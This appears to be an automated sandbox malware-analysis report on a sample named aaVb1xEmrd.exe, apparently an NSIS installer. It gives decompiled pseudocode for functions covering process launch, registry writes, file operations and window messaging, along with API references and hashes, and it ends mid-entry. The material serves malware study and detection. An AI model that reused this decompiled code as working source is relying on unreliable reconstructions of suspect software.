                                                                      Function 00401C13, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E00401C13() {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				 *(_t58 - 8) = E00402A9D(0x33);
				 *(_t58 + 8) = E00402A9D(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E0040591B(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E0040591B(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9D();
					_t30 = E00402A9D();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A80();
					_t39 = E00402A80();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E00405902();
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                                      0x00401c1c
                                                                      0x00401c28
                                                                      0x00401c2b
                                                                      0x00401c35
                                                                      0x00401c35
                                                                      0x00401c38
                                                                      0x00401c3c
                                                                      0x00401c46
                                                                      0x00401c46
                                                                      0x00401c49
                                                                      0x00401c4d
                                                                      0x00401c4f
                                                                      0x00401c9c
                                                                      0x00401c9e
                                                                      0x00401ca7
                                                                      0x00401caf
                                                                      0x00401cb2
                                                                      0x00401cb2
                                                                      0x00401cbb
                                                                      0x00000000
                                                                      0x00401c51
                                                                      0x00401c58
                                                                      0x00401c5a
                                                                      0x00401c62
                                                                      0x00401c65
                                                                      0x00401c8d
                                                                      0x00401cc1
                                                                      0x00401cc1
                                                                      0x00401c67
                                                                      0x00401c75
                                                                      0x00401c7d
                                                                      0x00401c80
                                                                      0x00401c80
                                                                      0x00401c65
                                                                      0x00401cc4
                                                                      0x00401cc7
                                                                      0x00401ccd
                                                                      0x004028da
                                                                      0x004028da
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C75
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: e11061bb72638ae3bd0deea313d8b482590b00c30fe41d764879ae94fe1161ee
                                                                      • Instruction ID: 3a5bf530ac752b22a437cfc31646007f5d79456975b3ba3d86b5e97f3a866c7b
                                                                      • Opcode Fuzzy Hash: e11061bb72638ae3bd0deea313d8b482590b00c30fe41d764879ae94fe1161ee
                                                                      • Instruction Fuzzy Hash: 30219271A44109BFDF01AFA1CD4AAEE7FB5EF44308F10443AF502BA1E1D7798A819B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401E96, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E00401E96() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9D(_t24);
				E00404D69(0xffffffeb, _t13);
				_t15 = E00405222(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CD4(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405902(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                      0x00401e9c
                                                                      0x00401ea1
                                                                      0x00401eac
                                                                      0x00401eb3
                                                                      0x00401eb6
                                                                      0x004026d7
                                                                      0x00401ebc
                                                                      0x00401ebf
                                                                      0x00401ed0
                                                                      0x00401ecb
                                                                      0x00401ecb
                                                                      0x00401ee5
                                                                      0x00401eee
                                                                      0x00401efe
                                                                      0x00401f00
                                                                      0x00401f00
                                                                      0x00401ef0
                                                                      0x00401ef4
                                                                      0x00401ef4
                                                                      0x00401eee
                                                                      0x00401f07
                                                                      0x00401f0a
                                                                      0x00401f0a
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                        • Part of subcall function 00405222: GetFileAttributesA.KERNEL32(?,00000000), ref: 00405235
                                                                        • Part of subcall function 00405222: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C490,?), ref: 0040525E
                                                                        • Part of subcall function 00405222: CloseHandle.KERNEL32(?), ref: 0040526B
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401ED5
                                                                      • GetExitCodeProcess.KERNEL32 ref: 00401EE5
                                                                      • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F0A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401EA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 4003922372-501415292
                                                                      • Opcode ID: 665863f770ee8eec5de89819d747f022481933cd07641249716b5007927fa64f
                                                                      • Instruction ID: c77dd41efbf8efa9af3da6ff060a12916a8f1a2e1a374128a63c245e177da6a4
                                                                      • Opcode Fuzzy Hash: 665863f770ee8eec5de89819d747f022481933cd07641249716b5007927fa64f
                                                                      • Instruction Fuzzy Hash: 2F016D71904109EBCF11AF91DD45A9E76B1EF00309F20407BF601B51E1C7795A41AF9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040557D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E0040557D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004059A4(0x42b890, _a4);
				_t21 = E00405530(0x42b890);
				if(_t21 != 0) {
					E00405BD3(_t21);
					if(( *0x42f030 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42b890;
						while(1) {
							_t11 = lstrlenA(0x42b890);
							_push(0x42b890);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405C6C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004054E4(0x42b890);
								continue;
							} else {
								goto L1;
							}
						}
						E0040549D();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                      0x00405589
                                                                      0x00405594
                                                                      0x00405598
                                                                      0x0040559f
                                                                      0x004055ab
                                                                      0x004055b7
                                                                      0x004055b7
                                                                      0x004055cf
                                                                      0x004055d0
                                                                      0x004055d7
                                                                      0x004055d8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004055bb
                                                                      0x004055c2
                                                                      0x004055ca
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004055c2
                                                                      0x004055da
                                                                      0x00000000
                                                                      0x004055ee
                                                                      0x004055ad
                                                                      0x004055b1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004055b1
                                                                      0x0040559a
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                        • Part of subcall function 00405530: CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405543
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405552
                                                                      • lstrlenA.KERNEL32(0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004055D0
                                                                      • GetFileAttributesA.KERNEL32(0042B890,0042B890,0042B890,0042B890,0042B890,0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004055E0
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 0040557D
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040557E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-1730828616
                                                                      • Opcode ID: 96c86cf9868eca16e86c16923d2ccaad86c39b2b05d73de1ca30cf98d7d6add5
                                                                      • Instruction ID: 08f83a9645d615a1f3fca6076c9258d5bd8495f27e2b0ae55a07427201ac287e
                                                                      • Opcode Fuzzy Hash: 96c86cf9868eca16e86c16923d2ccaad86c39b2b05d73de1ca30cf98d7d6add5
                                                                      • Instruction Fuzzy Hash: F5F02821115E5176D622233A5C09BAF1B57CE86328758013BF854B12DADB3C89438DBE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040549D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040549D(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                      0x0040549e
                                                                      0x004054b5
                                                                      0x004054bd
                                                                      0x004054bd
                                                                      0x004054c5

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403147,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 004054A3
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403147,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 004054AC
                                                                      • lstrcatA.KERNEL32(?,00409010), ref: 004054BD
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040549D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3916508600
                                                                      • Opcode ID: fa18c72888df976b0cdd87e733246f6d285642e2e97fc5e36dee98bae91ecb96
                                                                      • Instruction ID: 7accce88ca4bde2ae3d88cdcd9180504cfe9e7b5ea7e201f7bf235b5a5a95591
                                                                      • Opcode Fuzzy Hash: fa18c72888df976b0cdd87e733246f6d285642e2e97fc5e36dee98bae91ecb96
                                                                      • Instruction Fuzzy Hash: 42D0A7A2605A30AAE11122154C05FCF2D28CF46311F044422F144B21D2C2BC1C418BED
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402383, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E00402383(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t30;
				void* _t35;

				_t15 = E00402B64(__eax);
				_t30 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9D(2);
				_t18 = E00402A9D(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t30 == 1) {
						E00402A9D(0x23);
						_t19 = lstrlenA(0x40a3e8) + 1;
					}
					if(_t30 == 4) {
						_t24 = E00402A80(3);
						 *0x40a3e8 = _t24;
						_t19 = _t30;
					}
					if(_t30 == 3) {
						_t19 = E00402EB4( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a3e8, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a3e8, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x42f0a8 =  *0x42f0a8 +  *(_t35 - 4);
				return 0;
			}










                                                                      0x00402384
                                                                      0x00402389
                                                                      0x00402393
                                                                      0x0040239d
                                                                      0x004023a0
                                                                      0x004023b2
                                                                      0x004023b9
                                                                      0x004023c1
                                                                      0x004023cf
                                                                      0x004023d3
                                                                      0x004023de
                                                                      0x004023de
                                                                      0x004023e2
                                                                      0x004023e6
                                                                      0x004023ec
                                                                      0x004023f1
                                                                      0x004023f1
                                                                      0x004023f5
                                                                      0x00402401
                                                                      0x00402401
                                                                      0x0040241a
                                                                      0x0040241c
                                                                      0x0040241c
                                                                      0x0040241f
                                                                      0x004024f8
                                                                      0x004024f8
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023B9
                                                                      • lstrlenA.KERNEL32(0040A3E8,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023D9
                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,0040A3E8,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402412
                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A3E8,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID:
                                                                      • API String ID: 1356686001-0
                                                                      • Opcode ID: acb5ba45e2f8f4fbc14a41b1742fcc44b9183c903e08a5de38a3b0d1b3cacaf8
                                                                      • Instruction ID: 2edb51e588ba3c232a4f85ee768a2477bcb618cef822ad648bcbfee9d8c62a47
                                                                      • Opcode Fuzzy Hash: acb5ba45e2f8f4fbc14a41b1742fcc44b9183c903e08a5de38a3b0d1b3cacaf8
                                                                      • Instruction Fuzzy Hash: 78118471E00214BEEB10EFA5DE49EAF767CEB10358F10403AF505B61D1D6B85D419A69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401F45, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E00401F45(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9D(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E00405902(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E00405902(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                                      0x00401f4a
                                                                      0x00401f4d
                                                                      0x00401f55
                                                                      0x00401f5a
                                                                      0x00401f5f
                                                                      0x00401f63
                                                                      0x00401f66
                                                                      0x00401f68
                                                                      0x00401f6f
                                                                      0x00401f78
                                                                      0x00401f80
                                                                      0x00401f83
                                                                      0x00401f98
                                                                      0x00401f9e
                                                                      0x00401fb1
                                                                      0x00401fba
                                                                      0x00401fc6
                                                                      0x00401fcb
                                                                      0x00401fcb
                                                                      0x00401fb1
                                                                      0x00401fce
                                                                      0x00401bdb
                                                                      0x00401bdb
                                                                      0x00401f83
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F5A
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F78
                                                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F91
                                                                      • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FAA
                                                                        • Part of subcall function 00405902: wsprintfA.USER32 ref: 0040590F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                      • String ID:
                                                                      • API String ID: 1404258612-0
                                                                      • Opcode ID: 2b8e42a6b9d4fa02b5f75fb16d08b0ae1d2a9a65ee0503dc016e4bd12e94ec95
                                                                      • Instruction ID: d80a44c5c930a2dc6f3206c71cc4dfa484853edc82de331d7c2dd70d942dae4f
                                                                      • Opcode Fuzzy Hash: 2b8e42a6b9d4fa02b5f75fb16d08b0ae1d2a9a65ee0503dc016e4bd12e94ec95
                                                                      • Instruction Fuzzy Hash: 7A1128B1A01108BEDF01DFA5D9859EEBBB8EF04304F20803AF505F61A1D7389E54DB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004021F3, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E004021F3() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t37;
				void* _t40;

				_t37 = E00402A9D(_t33);
				 *(_t40 + 8) = _t37;
				_t35 = E00402A9D(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t37[1]))[lstrlenA(_t37)] = _t33;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				E004059C6(_t33, _t35, 0x40a3e8, 0x40a3e8, 0xfffffff8);
				lstrcatA(0x40a3e8, _t35);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t35;
				 *(_t40 - 0x4a) = 0x40a3e8;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D69(_t33, 0x40a3e8);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D69(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                                      0x004021f9
                                                                      0x004021fd
                                                                      0x00402205
                                                                      0x0040220b
                                                                      0x0040220e
                                                                      0x0040221b
                                                                      0x0040222c
                                                                      0x00402230
                                                                      0x00402237
                                                                      0x00402240
                                                                      0x00402248
                                                                      0x0040224b
                                                                      0x0040224e
                                                                      0x00402252
                                                                      0x00402263
                                                                      0x0040226c
                                                                      0x004026d7
                                                                      0x004026d7
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • lstrlenA.KERNEL32 ref: 00402215
                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040221F
                                                                      • lstrcatA.KERNEL32(0040A3E8,00000000,0040A3E8,000000F8,00000000), ref: 00402237
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      • SHFileOperationA.SHELL32(?,?,0040A3E8,0040A3E8,00000000,0040A3E8,000000F8,00000000), ref: 0040225B
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                      • String ID:
                                                                      • API String ID: 3674637002-0
                                                                      • Opcode ID: 363d70ccfff98ba2865c6782dce067ec9b095fcb7dffcb8770c2d1ed5c515656
                                                                      • Instruction ID: 6d1e946217665ea6dca397224418fd46b4aafc0dfc156e6b869a76ed9929bbd9
                                                                      • Opcode Fuzzy Hash: 363d70ccfff98ba2865c6782dce067ec9b095fcb7dffcb8770c2d1ed5c515656
                                                                      • Instruction Fuzzy Hash: 6611E1B1E04318EACB10EFEA89489CEBBF8AF00314F10413BB514FB2D1C67889418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405530, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
